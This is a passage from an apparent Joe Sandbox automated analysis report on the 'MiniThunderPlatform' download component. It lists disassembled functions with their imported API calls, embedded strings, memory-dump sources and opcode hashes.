                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle$FileUnmapView
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 260491571-0
                                                                                                                                              • Opcode ID: beb7313cffe0216d6c04aab85e87e27e166178326441370ee1d5708838cd2304
                                                                                                                                              • Instruction ID: c1866b87bc1e2e4ac6ffe8b154e4e17da0bb3328aa02f199169b56f143ef4e75
                                                                                                                                              • Opcode Fuzzy Hash: beb7313cffe0216d6c04aab85e87e27e166178326441370ee1d5708838cd2304
                                                                                                                                              • Instruction Fuzzy Hash: BA411B75A00218AFC764DF59D485B9DBBB1AB08318F4241D9E8056B361CB79EEC4CF85
                                                                                                                                              Function 10001BEE Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001BF3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001C06
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001C1B
                                                                                                                                                • Part of subcall function 1001580D: __EH_prolog.LIBCMT ref: 10015812
                                                                                                                                                • Part of subcall function 1001580D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 10015858
                                                                                                                                                • Part of subcall function 1001580D: RtlLeaveCriticalSection.NTDLL(?), ref: 10015881
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?), ref: 10001C3F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001C4C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CriticalLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4167419871-0
                                                                                                                                              • Opcode ID: 5c6ac23446af03f5da670b76865f0c0f1e92726a0a2b844e9ec25e59cd057866
                                                                                                                                              • Instruction ID: 50148beea36ce2048dfb407206ae1b021c172240ad0ac357200dcc4422b4557c
                                                                                                                                              • Opcode Fuzzy Hash: 5c6ac23446af03f5da670b76865f0c0f1e92726a0a2b844e9ec25e59cd057866
                                                                                                                                              • Instruction Fuzzy Hash: FB11A17590111AEFDB04CF50D998ADD7FB0FF28351F004148FC06672A0DB309A55DB60
                                                                                                                                              Function 10001B65 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001B6A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001B7D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001B92
                                                                                                                                                • Part of subcall function 10015899: __EH_prolog.LIBCMT ref: 1001589E
                                                                                                                                                • Part of subcall function 10015899: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 100158E4
                                                                                                                                                • Part of subcall function 10015899: RtlLeaveCriticalSection.NTDLL(?), ref: 10015910
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?), ref: 10001BB6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001BC3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CriticalLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4167419871-0
                                                                                                                                              • Opcode ID: 4da1b4b752b3676e724926ea53d67e87597e4567d5b7459b6913c3721622af16
                                                                                                                                              • Instruction ID: bf394059cbac06d18b94038dc14ecb1d574c1264aba1c3e9d32e83221229961f
                                                                                                                                              • Opcode Fuzzy Hash: 4da1b4b752b3676e724926ea53d67e87597e4567d5b7459b6913c3721622af16
                                                                                                                                              • Instruction Fuzzy Hash: 1911807690111AEFDB14DF90C989BEE7FB0EF29391F004148F802672A0DB315A55DBA0
                                                                                                                                              Function 10046E00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 226COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10046F05
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$false$thunder_assert
                                                                                                                                              • API String ID: 1972284567-889199498
                                                                                                                                              • Opcode ID: cf398527e21b3c5a1dd96690198986f42092ab72a30d312daae026a3acf1ac83
                                                                                                                                              • Instruction ID: 24676e7eea9019f5265ba535d6167cef4270f1f692e5349f73d903f5f2aca6f8
                                                                                                                                              • Opcode Fuzzy Hash: cf398527e21b3c5a1dd96690198986f42092ab72a30d312daae026a3acf1ac83
                                                                                                                                              • Instruction Fuzzy Hash: 5E910375A00605EFC714CFA4C885EAAB7B9FF8D310F204958E996DB241D770BA46CBA1
                                                                                                                                              Function 1001186B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10011347: wcslen.MSVCR71(10311990,00000000,?,00000104), ref: 10011372
                                                                                                                                                • Part of subcall function 10011347: GetPrivateProfileStringW.KERNEL32(data,path,102780C0,10311990,00000208,?), ref: 100113C6
                                                                                                                                                • Part of subcall function 10011347: wcslen.MSVCR71(10311990), ref: 100113CD
                                                                                                                                              • wcscmp.MSVCR71(?,%INSTALLPATH%,?,7C3869BF), ref: 100118AE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$PrivateProfileStringwcscmp
                                                                                                                                              • String ID: %INSTALLPATH%$Mini_downloadlib\$userdata\
                                                                                                                                              • API String ID: 1593441161-3583770345
                                                                                                                                              • Opcode ID: 8147b3c0074755dff424da55d9252979fed5ea6602ef8848b7c4cce511cb617f
                                                                                                                                              • Instruction ID: efea05c33be046b407165317e950478a87a11e175b6f27c7a7e319bd75ecc026
                                                                                                                                              • Opcode Fuzzy Hash: 8147b3c0074755dff424da55d9252979fed5ea6602ef8848b7c4cce511cb617f
                                                                                                                                              • Instruction Fuzzy Hash: 3C31E67690521DBEDF18DAA0DC02EEE33ACEF49254F40C07AF918E9041EF71EA958A55
                                                                                                                                              Function 00437310 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • wcscmp.MSVCR71(?,MODEM,0000053C,0000053C,00000000), ref: 004373B3
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(?), ref: 004373E0
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(?), ref: 00437406
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??4?$basic_string@_U?$char_traits@_V01@V?$allocator@_W@2@@std@@W@std@@$wcscmp
                                                                                                                                              • String ID: MODEM
                                                                                                                                              • API String ID: 2673633569-1472626943
                                                                                                                                              • Opcode ID: bc29ae98a036a86aa03d683d909c415ef7a5effe59fea9b93a3b99e45c63f822
                                                                                                                                              • Instruction ID: cbf48488ff11be81c5100ec2e4b830002058dd3f8f87efb9744e21ff97e89dc7
                                                                                                                                              • Opcode Fuzzy Hash: bc29ae98a036a86aa03d683d909c415ef7a5effe59fea9b93a3b99e45c63f822
                                                                                                                                              • Instruction Fuzzy Hash: 8331FE71A046189BDB60DB58DC91BEE7B74EB09345F10016BE405F7640DB399E84CF96
                                                                                                                                              Function 10089990 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __RTDynamicCast.MSVCR71(?,00000000,103008C4,103008E4,00000000,?,?,?,?,102495F8,000000FF), ref: 100899BD
                                                                                                                                                • Part of subcall function 10075B3E: __EH_prolog.LIBCMT ref: 10075B43
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • _command_ptr == NULL, xrefs: 10089A0E
                                                                                                                                              • d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h, xrefs: 10089A04
                                                                                                                                              • thunder_assert, xrefs: 10089A09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CastDynamicV01@@
                                                                                                                                              • String ID: _command_ptr == NULL$d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h$thunder_assert
                                                                                                                                              • API String ID: 4117862591-1935395585
                                                                                                                                              • Opcode ID: 9c8fef82fbe41e2729900350817b0e0c507af692475e47d58d900fce2c6c4b17
                                                                                                                                              • Instruction ID: 047eab8689c099701092693b851c3f237f597d23df706c6aa75b34e05319bb90
                                                                                                                                              • Opcode Fuzzy Hash: 9c8fef82fbe41e2729900350817b0e0c507af692475e47d58d900fce2c6c4b17
                                                                                                                                              • Instruction Fuzzy Hash: 5C21ACB1208341ABD300CF58CC44F9BB7E8FF89A64F148A19F489A7291D735E9048BA2
                                                                                                                                              Function 00423090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423114
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00423126
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423159
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_$?data@?$basic_string@_
                                                                                                                                              • String ID: dl_peer_id.dll
                                                                                                                                              • API String ID: 855986704-3148526724
                                                                                                                                              • Opcode ID: ea59417bd1c30fba845b0b601998337731ff7cbb45961d1c4924a5a33d04d310
                                                                                                                                              • Instruction ID: 58786cf5b9c3a1c73be63df437160e73f67fd965e7f3b30e158dfa5e0707e652
                                                                                                                                              • Opcode Fuzzy Hash: ea59417bd1c30fba845b0b601998337731ff7cbb45961d1c4924a5a33d04d310
                                                                                                                                              • Instruction Fuzzy Hash: 1821D872C045589BCB20EB95EC41BDDBB34EB44314F0101AEE91963391DA385F88CB95
                                                                                                                                              Function 10026310 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(?), ref: 1002632A
                                                                                                                                              • CoCreateInstance.COMBASE(1029610C,00000000,00000001,1029611C,00000000), ref: 10026343
                                                                                                                                              • CoUninitialize.COMBASE ref: 100263C9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                              • String ID: 2
                                                                                                                                              • API String ID: 948891078-450215437
                                                                                                                                              • Opcode ID: 61e2e6baaad7e802a9e5de4f6d6a3a73f6ba87c8f146301c856cffa500bfdf82
                                                                                                                                              • Instruction ID: 3cf4988ab779a0bb4ef764863982bcd2ef18819b0a3522b818de9d0c403307aa
                                                                                                                                              • Opcode Fuzzy Hash: 61e2e6baaad7e802a9e5de4f6d6a3a73f6ba87c8f146301c856cffa500bfdf82
                                                                                                                                              • Instruction Fuzzy Hash: F7212371604306ABE324DF54DC88B1BBBE8FB88384F10881DF999D7250D771E949CB92
                                                                                                                                              Function 1006D306 Relevance: 6.3, APIs: 4, Instructions: 260COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1006D30B
                                                                                                                                              • AtlComPtrAssign.ATL71(1031202C,?), ref: 1006D324
                                                                                                                                              • AtlComPtrAssign.ATL71(-00000004,?), ref: 1006D4BE
                                                                                                                                              • AtlComPtrAssign.ATL71(10312050,00000000), ref: 1006D4F1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1563082498-0
                                                                                                                                              • Opcode ID: c4ba392267c119327b5df93f99ab442d4950b4ed44c23c32643666af92b2fdea
                                                                                                                                              • Instruction ID: ac4122b2081ad40e8eb1a72f5f7c0e2452a69dab62fc5a56b26d8665e937bf2e
                                                                                                                                              • Opcode Fuzzy Hash: c4ba392267c119327b5df93f99ab442d4950b4ed44c23c32643666af92b2fdea
                                                                                                                                              • Instruction Fuzzy Hash: 1EA11070E00245EFDB01DBA4C848BAEBBB9EF4D314F148199E40AEB252D735ED55DB60
                                                                                                                                              Function 1001A726 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(102FE990), ref: 1001A741
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(102FE990), ref: 1001A750
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(102FE990), ref: 1001A762
                                                                                                                                              • CoUninitialize.COMBASE ref: 1001A867
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Leave$EnterUninitialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2788927147-0
                                                                                                                                              • Opcode ID: 8e729b5d020b9c341b8290343373c771dc72dec15e9c79dcd0f21f92cbcfa186
                                                                                                                                              • Instruction ID: a93a47c98d324ea1c2e9d4aafc5b0f93b96c97646f3e9d18b6d2ca462710d3db
                                                                                                                                              • Opcode Fuzzy Hash: 8e729b5d020b9c341b8290343373c771dc72dec15e9c79dcd0f21f92cbcfa186
                                                                                                                                              • Instruction Fuzzy Hash: 894105756006119FC710DFA4CC88A9ABBF9FF9A304B514869F48ACB252CB35E986CF50
                                                                                                                                              Function 10053B90 Relevance: 6.1, APIs: 4, Instructions: 94networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • inet_addr.WS2_32(?), ref: 10053BF8
                                                                                                                                              • htons.WS2_32(00000035), ref: 10053C19
                                                                                                                                              • sendto.WS2_32(?,?,00000200,00000000,00000002,00000010), ref: 10053C81
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10053C8D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLasthtonsinet_addrsendto
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4021779738-0
                                                                                                                                              • Opcode ID: 5e3ccc920feff8f7c02c1dd0c182bbf498aa0fe7a04602dc64328b024907f5aa
                                                                                                                                              • Instruction ID: 1d73a20a5aa520a7bd456a333122b8f3afb91ad6db11b15eb719eece4488c90d
                                                                                                                                              • Opcode Fuzzy Hash: 5e3ccc920feff8f7c02c1dd0c182bbf498aa0fe7a04602dc64328b024907f5aa
                                                                                                                                              • Instruction Fuzzy Hash: 24316275900258EBCB24DF98DD89B9EB7B4FB18710F1086ADF409A3281D7349A44CF95
                                                                                                                                              Function 1013C6F0 Relevance: 6.1, APIs: 4, Instructions: 79networkthreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1013C711
                                                                                                                                                • Part of subcall function 1013B4D0: RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013B4E4
                                                                                                                                                • Part of subcall function 1013B4D0: RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013B506
                                                                                                                                                • Part of subcall function 1013B4D0: RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013B558
                                                                                                                                                • Part of subcall function 1013B4D0: RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013B58F
                                                                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000003,?,00000000,000001F4,00000000), ref: 1013C75C
                                                                                                                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 1013C786
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1013C78D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterEventsLeave$CurrentEnumErrorLastMultipleNetworkThreadWait
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2709911251-0
                                                                                                                                              • Opcode ID: 97aab0092ca7a0e6a19b14907e14f3349e6517ed9fedf8edb5344890643af950
                                                                                                                                              • Instruction ID: 3491ed0e44893d72367fcc122e297a86910da73ddc2bcf984128865f13bbb1eb
